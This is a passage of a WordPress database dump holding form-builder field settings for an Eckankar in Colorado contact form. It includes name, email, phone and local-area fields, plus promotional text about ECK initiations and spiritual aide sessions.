dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8851,233,'field_label','Text','field_label','Text'),(8852,233,'field_key','html_177','field_key','html_177'),(8853,234,'field_label','First Name','field_label','First Name'),(6595,229,'key','listmultiselect_318','key','listmultiselect_318'),(6596,229,'container_class','','container_class',''),(6597,229,'parent_id','21','parent_id','21'),(6598,230,'objectType','Field','objectType','Field'),(6599,230,'objectDomain','fields','objectDomain','fields'),(6600,230,'editActive','','editActive',''),(6601,230,'order','8','order','8'),(6602,230,'type','html','type','html'),(6603,230,'label','Text','label','Text'),(6604,230,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(6605,230,'default_value','<i>Interested In Becoming A Member? <a href=\"http://www.eckankar.org/Membership/invitation0.php\" target=\"_blank\">Go here!</a></i>\r\n<i>or Download the Membership flyer<a href=\"https://eckankar-colorado.org/wp-content/uploads/2016/01/Advanced-Spiritual-Study-Inside-and-outside.pdf\" target=\"_blank\"> Here.</i></a>','default_value','<i>Interested In Becoming A Member? <a href=\"http://www.eckankar.org/Membership/invitation0.php\" target=\"_blank\">Go here!</a></i>\r\n<i>or Download the Membership flyer<a href=\"https://eckankar-colorado.org/wp-content/uploads/2016/01/Advanced-Spiritual-Study-Inside-and-outside.pdf\" target=\"_blank\"> Here.</i></a>'),(6606,230,'desc_el','div','desc_el','div'),(6607,230,'show_desc','0','show_desc','0'),(6608,230,'desc_pos','none','desc_pos','none'),(6609,230,'desc_text','','desc_text',''),(6610,230,'element_class','','element_class',''),(6611,230,'default','<i>Interested In Becoming A Member? <a href=\"http://www.eckankar.org/Membership/invitation0.php\" target=\"_blank\">Go here!</a></i>&nbsp;','default','<i>Interested In Becoming A Member? <a href=\"http://www.eckankar.org/Membership/invitation0.php\" target=\"_blank\">Go here!</a></i>&nbsp;'),(6612,230,'key','html_313','key','html_313'),(6613,230,'container_class','','container_class',''),(6614,230,'drawerDisabled','','drawerDisabled',''),(6615,230,'parent_id','21','parent_id','21'),(17045,599,'default','<p></p>\n<p></p>\n<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\n\nPlease Enter Your Information Below','default','<p></p>\n<p></p>\n<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\n\nPlease Enter Your Information Below'),(17477,622,'order','13','order','13'),(17044,599,'element_class','','element_class',''),(17474,621,'key','html_1663797801429','key','html_1663797801429'),(17475,621,'drawerDisabled','','drawerDisabled',''),(17476,622,'editActive','','editActive',''),(17473,621,'element_class','','element_class',''),(17472,621,'container_class','','container_class',''),(6633,232,'objectType','Field','objectType','Field'),(6634,232,'objectDomain','fields','objectDomain','fields'),(6635,232,'editActive','','editActive',''),(6636,232,'order','10','order','10'),(6637,232,'type','submit','type','submit'),(6638,232,'label','Submit','label','Submit'),(6639,232,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(6640,232,'show_help','0','show_help','0'),(6641,232,'help_text','','help_text',''),(6642,232,'show_desc','0','show_desc','0'),(6643,232,'desc_pos','none','desc_pos','none'),(6644,232,'desc_text','','desc_text',''),(6645,232,'processing_label','Processing','processing_label','Processing'),(6646,232,'element_class','','element_class',''),(6647,232,'key','submit_315','key','submit_315'),(6648,232,'container_class','','container_class',''),(6649,232,'parent_id','21','parent_id','21'),(6650,233,'objectType','Field','objectType','Field'),(6651,233,'objectDomain','fields','objectDomain','fields'),(6652,233,'editActive','','editActive',''),(6653,233,'order','1','order','1'),(6654,233,'type','html','type','html'),(6655,233,'label','Text','label','Text'),(6656,233,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(6657,233,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Pueblo Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Pueblo Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.'),(6658,233,'desc_el','div','desc_el','div'),(6659,233,'show_desc','0','show_desc','0'),(6660,233,'desc_pos','none','desc_pos','none'),(6661,233,'desc_text','','desc_text',''),(6662,233,'element_class','','element_class',''),(6663,233,'default','<p><p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Pueblo Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','default','<p><p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Pueblo Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>'),(6664,233,'key','html_177','key','html_177'),(6665,233,'container_class','','container_class',''),(6666,233,'drawerDisabled','','drawerDisabled',''),(6667,233,'parent_id','22','parent_id','22'),(6668,234,'objectType','Field','objectType','Field'),(6669,234,'objectDomain','fields','objectDomain','fields'),(6670,234,'editActive','','editActive',''),(6671,234,'order','2','order','2'),(6672,234,'type','textbox','type','textbox'),(6673,234,'def_id','6','def_id','6'),(6674,234,'label','First Name','label','First Name'),(6675,234,'label_pos','above','label_pos','above'),(6676,234,'mask','','mask',''),(6677,234,'datepicker','0','datepicker','0'),(6678,234,'first_name','1','first_name','1'),(6679,234,'last_name','0','last_name','0'),(6680,234,'from_name','0','from_name','0'),(6681,234,'user_info_field_group','1','user_info_field_group','1'),(6682,234,'show_help','0','show_help','0'),(6683,234,'help_text','','help_text',''),(6684,234,'calc_auto_include','0','calc_auto_include','0'),(6685,234,'calc_option','0','calc_option','0'),(6686,234,'placeholder','','placeholder',''),(6687,234,'user_address_1','','user_address_1',''),(6688,234,'user_address_2','','user_address_2',''),(6689,234,'user_city','','user_city',''),(6690,234,'user_zip','','user_zip',''),(6691,234,'user_phone','','user_phone',''),(6692,234,'user_email','','user_email',''),(6693,234,'disable_input','0','disable_input','0'),(6694,234,'input_limit','','input_limit',''),(6695,234,'input_limit_type','char','input_limit_type','char'),(6696,234,'input_limit_msg','','input_limit_msg',''),(6697,234,'user_state','0','user_state','0'),(6698,234,'autocomplete_off','0','autocomplete_off','0'),(6699,234,'num_sort','0','num_sort','0'),(6700,234,'admin_label','','admin_label',''),(6701,234,'user_info_field_group_name','','user_info_field_group_name',''),(6702,234,'user_info_field_group_custom','','user_info_field_group_custom',''),(6703,234,'show_desc','0','show_desc','0'),(6704,234,'desc_pos','none','desc_pos','none'),(6705,234,'desc_text','','desc_text',''),(6706,234,'element_class','','element_class',''),(6707,234,'required','1','required','1'),(6708,234,'key','textbox_178','key','textbox_178'),(6709,234,'default','','default',''),(6710,234,'container_class','one-half first','container_class','one-half first'),(6711,234,'manual_key','','manual_key',''),(6712,234,'custom_mask','','custom_mask',''),(6713,234,'parent_id','22','parent_id','22'),(6714,235,'objectType','Field','objectType','Field'),(6715,235,'objectDomain','fields','objectDomain','fields'),(6716,235,'editActive','','editActive',''),(6717,235,'order','3','order','3'),(6718,235,'type','lastname','type','lastname'),(6719,235,'def_id','7','def_id','7'),(6720,235,'label','Last Name','label','Last Name'),(6721,235,'label_pos','above','label_pos','above'),(6722,235,'mask','','mask',''),(6723,235,'datepicker','0','datepicker','0'),(6724,235,'first_name','0','first_name','0'),(6725,235,'from_name','0','from_name','0'),(6726,235,'user_info_field_group','1','user_info_field_group','1'),(6727,235,'show_help','0','show_help','0'),(6728,235,'help_text','','help_text',''),(6729,235,'calc_auto_include','0','calc_auto_include','0'),(6730,235,'calc_option','0','calc_option','0'),(6731,235,'placeholder','','placeholder',''),(6732,235,'user_address_1','','user_address_1',''),(6733,235,'user_address_2','','user_address_2',''),(6734,235,'user_city','','user_city',''),(6735,235,'user_zip','','user_zip',''),(6736,235,'user_phone','','user_phone',''),(6737,235,'user_email','','user_email',''),(6738,235,'disable_input','0','disable_input','0'),(6739,235,'input_limit','','input_limit',''),(6740,235,'input_limit_type','char','input_limit_type','char'),(6741,235,'input_limit_msg','','input_limit_msg',''),(6742,235,'user_state','0','user_state','0'),(6743,235,'autocomplete_off','0','autocomplete_off','0'),(6744,235,'num_sort','0','num_sort','0'),(6745,235,'admin_label','','admin_label',''),(6746,235,'user_info_field_group_name','','user_info_field_group_name',''),(6747,235,'user_info_field_group_custom','','user_info_field_group_custom',''),(6748,235,'show_desc','0','show_desc','0'),(6749,235,'desc_pos','none','desc_pos','none'),(6750,235,'desc_text','','desc_text',''),(6751,235,'element_class','','element_class',''),(6752,235,'required','1','required','1'),(6753,235,'key','lastname_179','key','lastname_179'),(6754,235,'default','','default',''),(6755,235,'container_class','one-half','container_class','one-half'),(6756,235,'parent_id','22','parent_id','22'),(6757,236,'objectType','Field','objectType','Field'),(6758,236,'objectDomain','fields','objectDomain','fields'),(6759,236,'editActive','','editActive',''),(6760,236,'order','4','order','4'),(6761,236,'type','email','type','email'),(6762,236,'def_id','14','def_id','14'),(6763,236,'label','Email','label','Email'),(6764,236,'label_pos','above','label_pos','above'),(6765,236,'mask','','mask',''),(6766,236,'datepicker','0','datepicker','0'),(6767,236,'first_name','0','first_name','0'),(6768,236,'last_name','0','last_name','0'),(6769,236,'from_name','0','from_name','0'),(6770,236,'user_address_1','0','user_address_1','0'),(6771,236,'user_address_2','0','user_address_2','0'),(6772,236,'user_city','0','user_city','0'),(6773,236,'user_zip','0','user_zip','0'),(6774,236,'user_phone','0','user_phone','0'),(6775,236,'user_info_field_group','1','user_info_field_group','1'),(6776,236,'show_help','0','show_help','0'),(6777,236,'help_text','','help_text',''),(6778,236,'calc_auto_include','0','calc_auto_include','0'),(6779,236,'calc_option','0','calc_option','0'),(6780,236,'placeholder','','placeholder',''),(6781,236,'disable_input','0','disable_input','0'),(6782,236,'input_limit','','input_limit',''),(6783,236,'input_limit_type','char','input_limit_type','char'),(6784,236,'input_limit_msg','','input_limit_msg',''),(6785,236,'user_state','0','user_state','0'),(6786,236,'autocomplete_off','0','autocomplete_off','0'),(6787,236,'num_sort','0','num_sort','0'),(6788,236,'admin_label','','admin_label',''),(6789,236,'user_info_field_group_name','','user_info_field_group_name',''),(6790,236,'user_info_field_group_custom','','user_info_field_group_custom',''),(6791,236,'show_desc','0','show_desc','0'),(6792,236,'desc_pos','none','desc_pos','none'),(6793,236,'desc_text','','desc_text',''),(6794,236,'element_class','','element_class',''),(6795,236,'required','1','required','1'),(6796,236,'key','email_180','key','email_180'),(6797,236,'default','','default',''),(6798,236,'container_class','one-half first','container_class','one-half first'),(6799,236,'parent_id','22','parent_id','22'),(6800,237,'objectType','Field','objectType','Field'),(6801,237,'objectDomain','fields','objectDomain','fields'),(6802,237,'editActive','','editActive',''),(6803,237,'order','5','order','5'),(6804,237,'type','phone','type','phone'),(6805,237,'def_id','15','def_id','15'),(6806,237,'label','Phone','label','Phone'),(6807,237,'label_pos','above','label_pos','above'),(6808,237,'mask','(999) 999-9999','mask','(999) 999-9999'),(6809,237,'datepicker','0','datepicker','0'),(6810,237,'first_name','0','first_name','0'),(6811,237,'last_name','0','last_name','0'),(6812,237,'from_name','0','from_name','0'),(6813,237,'user_address_1','0','user_address_1','0'),(6814,237,'user_address_2','0','user_address_2','0'),(6815,237,'user_city','0','user_city','0'),(6816,237,'user_zip','0','user_zip','0'),(6817,237,'user_email','0','user_email','0'),(6818,237,'user_info_field_group','1','user_info_field_group','1'),(6819,237,'show_help','0','show_help','0'),(6820,237,'help_text','','help_text',''),(6821,237,'calc_auto_include','0','calc_auto_include','0'),(6822,237,'calc_option','0','calc_option','0'),(6823,237,'placeholder','','placeholder',''),(6824,237,'disable_input','0','disable_input','0'),(6825,237,'input_limit','','input_limit',''),(6826,237,'input_limit_type','char','input_limit_type','char'),(6827,237,'input_limit_msg','','input_limit_msg',''),(6828,237,'user_state','0','user_state','0'),(6829,237,'autocomplete_off','0','autocomplete_off','0'),(6830,237,'num_sort','0','num_sort','0'),(6831,237,'admin_label','','admin_label',''),(6832,237,'user_info_field_group_name','','user_info_field_group_name',''),(6833,237,'user_info_field_group_custom','','user_info_field_group_custom',''),(6834,237,'show_desc','0','show_desc','0'),(6835,237,'desc_pos','none','desc_pos','none'),(6836,237,'desc_text','','desc_text',''),(6837,237,'element_class','','element_class',''),(6838,237,'required','1','required','1'),(6839,237,'key','phone_181','key','phone_181'),(6840,237,'default','','default',''),(6841,237,'container_class','one-half','container_class','one-half'),(6842,237,'manual_key','','manual_key',''),(6843,237,'custom_mask','','custom_mask',''),(6844,237,'parent_id','22','parent_id','22'),(6845,238,'objectType','Field','objectType','Field'),(6846,238,'objectDomain','fields','objectDomain','fields'),(6847,238,'editActive','','editActive',''),(6848,238,'order','6','order','6'),(6849,238,'type','listselect','type','listselect'),(6850,238,'label','Your Local Area','label','Your Local Area'),(6851,238,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(6852,238,'label_pos','above','label_pos','above'),(6853,238,'list_type','dropdown','list_type','dropdown'),(6854,238,'multi_size','5','multi_size','5'),(6855,238,'list_show_value','1','list_show_value','1'),(6856,238,'list','a:0:{}','list','a:0:{}'),(6857,238,'user_info_field_group','','user_info_field_group',''),(6858,238,'calc_auto_include','0','calc_auto_include','0'),(6859,238,'user_state','0','user_state','0'),(6860,238,'num_sort','0','num_sort','0'),(6861,238,'admin_label','','admin_label',''),(6862,238,'show_help','0','show_help','0'),(6863,238,'help_text','','help_text',''),(6864,238,'show_desc','0','show_desc','0'),(6865,238,'desc_pos','none','desc_pos','none'),(6866,238,'desc_text','','desc_text',''),(6867,238,'element_class','','element_class',''),(6868,238,'required','1','required','1'),(6869,238,'options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 